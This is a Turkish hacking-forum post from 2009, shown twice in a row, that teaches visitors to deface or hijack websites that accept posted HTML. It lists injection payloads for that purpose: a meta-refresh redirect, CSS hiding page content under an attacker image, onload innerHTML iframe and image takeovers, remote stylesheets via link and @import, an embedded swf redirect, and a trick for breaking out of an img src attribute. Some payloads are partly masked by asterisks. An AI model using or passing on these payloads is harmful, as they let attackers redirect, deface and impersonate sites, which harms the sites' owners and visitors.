Hack l Crack l Serial l Warez l Hacking and Security Forum

**DuyquSuz** · 03-07-2009

Bir sitenin ana sayfasına veya başka bir yerine post atabiliyorsunuz fakat bunu hack amaçlı kullanmak istiyorsanız işinize yarıyacak html taglarını seçmeniz gerekir,ben burda sitenin anasayfasına nasıl post gönderilir felan anlatmıycam sadece post gönderebiliyorsanız onu nasıl hack amaçlı kullanıcağınızı gösterecem...
1: en basit olan yönlendirme tagı
........................ **********='refresh' *********'0; url=http://www.hedef.com'>
bu kod ile html post edebildiğiniz siteyi kendi site adresinize yönlendirebilirsiniz, sıkça kullanılan bir yöntemdir fakat kodun çalışması site yüklenmesinden sonra gerçekleşiyor...
2: style ile tam sayfa resim döşemek
<body><style type=text/css>table, p, td, tr{visibility:hidden;}body {background-color: #000000;background-image: url('http://www.hedef.com/resim.jpg');}
bu kod ile sitede bulunan tabloları görünmez hale getirip kendi sitenizden çağırdığınız resmi tam sayfa döşemek için kullabilirsiniz...
3: çerçeve (frame) ile index
<body topmargin=0 leftmargin=0 onload="********.body.innerHTML='<iframe width=100% height=100% src=http://www.hedef.com></iframe>';">
bu kod ile yönlendirme değilde aynı sayfa içinde kendi sitenizden çağırdığınız sayfayı tam sayfa yapabilirsiniz, yanlız bunu post etmeniz için db'nin en az 100 karakterden fazla karakter alması gerekiyor, isterseneniz topmargin=0 leftmargin=0 kodlarını silebilirsiniz ama bunlar olursa daha iyi olur çünkü bu sayede frame (çerçeve) tam sayfa olur eğer bunu iptal ederseniz sayfanın üst alt ve yanlarından biraz boşluk kalacaktır...
4: tam sayfa resim döşemek
<body topmargin=0 leftmargin=0 onload="********.body.innerHTML='<img width=100% height=100% src=http://www.hedef.com/resim.jpg></img>';">
3. örnekte gördüğümüz ile aynı mantık ile çalışmaktadır ve siteye tam sayfa resmi döşemektedir...
5: .css çağırmak
<link href=http://www.hedef.com/dosya.css type=text/css rel=**********>
önce aşağıdaki style kodlarını bir txt dosyasına atıyoruz;
BODY {
SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: darkgray; SCROLLBAR-3DLIGHT-COLOR: #000000; SCROLLBAR-ARROW-COLOR: #000000; SCROLLBAR-TRACK-COLOR: gray; SCROLLBAR-DARKSHADOW-COLOR: #000000
}
A:link {
COLOR: darkblue; TEXT-DECORATION: none
}
A:visited {
COLOR: #000000; TEXT-DECORATION: none
}
A:hover {
COLOR: #000000
}
body, td, th {
color: #000000;
}
table, p, td, tr
{
visibility:hidden;
}
body {
background-color: #000000;
background-image:url(http://www.hedef.com/resim.jpg);
background-position:center;
background-repeat-repeat;
background-position:top;
}
not: ir2'nin kodlamasıdır...
daha sonra bunu .css veya başka bir uzantılı olarak kaydediyoruz, uzantısının .css olması önemli değil .tbt bile olsa <link href="dosya.tbt" olarak çağırdığınız zaman çalışır...
6: farklı bir yol ile .css çağırmak...
<style>@****** url([Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]);
evet arkadaşlar bu benim favori kodum, şimdi 5. örnekte gördüğümüz işlemlerin aynısını yapalım fakat çağırmayı link ile değilde style ile çağıralım, peki bunun diğerlerinden farkı ne onu söyliyeyim genelde dbden veri okuturken veritabanında metin kategorisi seçilir ve bu access'de otomatik olarak 50 karakter sınır bırakılır yani 50 karakterden fazla veri giremessiniz işte o zaman bu kod çok işinize yarıyacak yani diğer kodlar 50 karakterden uzun olduğu için çalışmazken bu kod çalışacaktır...
site adresini mümkün olduğunca kısa tutun, dosya uzantınını a.a da yapabilirsiniz, site eğer site.com olarak çalışıyorsa www kullanmayın...
8: .swf ile yölendirme
<embed src=http://www.hedef.com/hedef.swf>
yine aynı şekilde veritabanına kısıtlı bir veri işleniyorsa yani 50 karakterden az ve sizde sadece yönlendirmek istiyorsanız bu kod kullanılır...
7: resim çağırma
<img src=http://www.hedef.com/resim.jpg>
eğer ben uğraşmak istemiyorum sadece bir resim çağırsam yeterli diyorsanız bunu kullanın
Not: Bir sitede veritabanından veriyi çağırırken html tagının içine çağırıyorsa önce o html tagını kapatıp sonra kendi kodumuzu çalıştırmalıyız mesela <img src="resim.jpg"> adam resim.jpg ismini dbden okutuyor ve biz html tagını resim.jpg ismine post ettiğimiz zaman normalde çalışmaz <img src="........................ **********='refresh' *********'0; url=http://www.hedef.com'>"> çünkü bizim eklediğimiz kod img tagının src (resim) linki yerine geçer...
ama şöyle bir mantık geliştirirsek kendi ekliyeceğimiz koddan önce sitenin img tagını kapatıp sonrada kendi kodumuzu çalıştırırsak o zaman çalışır <img src="">........................ **********='refresh' *********'0; url=">[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]'>"> bu kod ile "> img tagımızı kapattık ve daha sonra kendi html tagımızı çalıştırdık en sonda kalan "> tagı ise boşta kaldı yani bir text yazısı gibi algılandı

03-07-2009	#1 (permalink)
DuyquSuz Beginner Insider Üyelik tarihi: Jul 2009 Yaş: 20 Mesajlar: 59 Konular: 28 Ettiği Teşekkür: 5 9 Mesajında 11 Kez Teşekkür Aldı Durumum:	SiteLere ''m e t a'' atmak Bir sitenin ana sayfasına veya başka bir yerine post atabiliyorsunuz fakat bunu hack amaçlı kullanmak istiyorsanız işinize yarıyacak html taglarını seçmeniz gerekir,ben burda sitenin anasayfasına nasıl post gönderilir felan anlatmıycam sadece post gönderebiliyorsanız onu nasıl hack amaçlı kullanıcağınızı gösterecem... 1: en basit olan yönlendirme tagı ........................ ********='refresh' *****'0; url=http://www.hedef.com'> bu kod ile html post edebildiğiniz siteyi kendi site adresinize yönlendirebilirsiniz, sıkça kullanılan bir yöntemdir fakat kodun çalışması site yüklenmesinden sonra gerçekleşiyor... 2: style ile tam sayfa resim döşemek <body><style type=text/css>table, p, td, tr{visibility:hidden;}body {background-color: #000000;background-image: url('http://www.hedef.com/resim.jpg');} bu kod ile sitede bulunan tabloları görünmez hale getirip kendi sitenizden çağırdığınız resmi tam sayfa döşemek için kullabilirsiniz... 3: çerçeve (frame) ile index <body topmargin=0 leftmargin=0 onload="****.body.innerHTML='<iframe width=100% height=100% src=http://www.hedef.com></iframe>';"> bu kod ile yönlendirme değilde aynı sayfa içinde kendi sitenizden çağırdığınız sayfayı tam sayfa yapabilirsiniz, yanlız bunu post etmeniz için db'nin en az 100 karakterden fazla karakter alması gerekiyor, isterseneniz topmargin=0 leftmargin=0 kodlarını silebilirsiniz ama bunlar olursa daha iyi olur çünkü bu sayede frame (çerçeve) tam sayfa olur eğer bunu iptal ederseniz sayfanın üst alt ve yanlarından biraz boşluk kalacaktır... 4: tam sayfa resim döşemek <body topmargin=0 leftmargin=0 onload="****.body.innerHTML='<img width=100% height=100% src=http://www.hedef.com/resim.jpg></img>';"> 3. örnekte gördüğümüz ile aynı mantık ile çalışmaktadır ve siteye tam sayfa resmi döşemektedir... 5: .css çağırmak <link href=http://www.hedef.com/dosya.css type=text/css rel=******> önce aşağıdaki style kodlarını bir txt dosyasına atıyoruz; BODY { SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: darkgray; SCROLLBAR-3DLIGHT-COLOR: #000000; SCROLLBAR-ARROW-COLOR: #000000; SCROLLBAR-TRACK-COLOR: gray; SCROLLBAR-DARKSHADOW-COLOR: #000000 } A:link { COLOR: darkblue; TEXT-DECORATION: none } A:visited { COLOR: #000000; TEXT-DECORATION: none } A:hover { COLOR: #000000 } body, td, th { color: #000000; } table, p, td, tr { visibility:hidden; } body { background-color: #000000; background-image:url(http://www.hedef.com/resim.jpg); background-position:center; background-repeat-repeat; background-position:top; } not: ir2'nin kodlamasıdır... daha sonra bunu .css veya başka bir uzantılı olarak kaydediyoruz, uzantısının .css olması önemli değil .tbt bile olsa <link href="dosya.tbt" olarak çağırdığınız zaman çalışır... 6: farklı bir yol ile .css çağırmak... <style>@** url([Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]); evet arkadaşlar bu benim favori kodum, şimdi 5. örnekte gördüğümüz işlemlerin aynısını yapalım fakat çağırmayı link ile değilde style ile çağıralım, peki bunun diğerlerinden farkı ne onu söyliyeyim genelde dbden veri okuturken veritabanında metin kategorisi seçilir ve bu access'de otomatik olarak 50 karakter sınır bırakılır yani 50 karakterden fazla veri giremessiniz işte o zaman bu kod çok işinize yarıyacak yani diğer kodlar 50 karakterden uzun olduğu için çalışmazken bu kod çalışacaktır... site adresini mümkün olduğunca kısa tutun, dosya uzantınını a.a da yapabilirsiniz, site eğer site.com olarak çalışıyorsa www kullanmayın... 8: .swf ile yölendirme <embed src=http://www.hedef.com/hedef.swf> yine aynı şekilde veritabanına kısıtlı bir veri işleniyorsa yani 50 karakterden az ve sizde sadece yönlendirmek istiyorsanız bu kod kullanılır... 7: resim çağırma <img src=http://www.hedef.com/resim.jpg> eğer ben uğraşmak istemiyorum sadece bir resim çağırsam yeterli diyorsanız bunu kullanın Not: Bir sitede veritabanından veriyi çağırırken html tagının içine çağırıyorsa önce o html tagını kapatıp sonra kendi kodumuzu çalıştırmalıyız mesela <img src="resim.jpg"> adam resim.jpg ismini dbden okutuyor ve biz html tagını resim.jpg ismine post ettiğimiz zaman normalde çalışmaz <img src="........................ ******='refresh' *****'0; url=http://www.hedef.com'>"> çünkü bizim eklediğimiz kod img tagının src (resim) linki yerine geçer... ama şöyle bir mantık geliştirirsek kendi ekliyeceğimiz koddan önce sitenin img tagını kapatıp sonrada kendi kodumuzu çalıştırırsak o zaman çalışır <img src="">........................ ******='refresh' *****'0; url=">[Bu Linki Görüntüleyebilmeniz İçin Üye Olmanız Gerekiyor. Üye Olmak İçn Tıklayınız]'>"> bu kod ile "> img tagımızı kapattık ve daha sonra kendi html tagımızı çalıştırdık en sonda kalan "> tagı ise boşta kaldı yani bir text yazısı gibi algılandı** Bu konu yada mesaj "www.turkishajan.com" sitesine aittir. __________________________________________________ ÇözüLmeyi BekLeyen TeK Şey ; ŞifreLer DegiLdir

Seçenekler
Yazdırılabilir şekli göster Sayfayı E-Mail olarak gönder
Konuyu değerlendir
Konuyu değerlendir: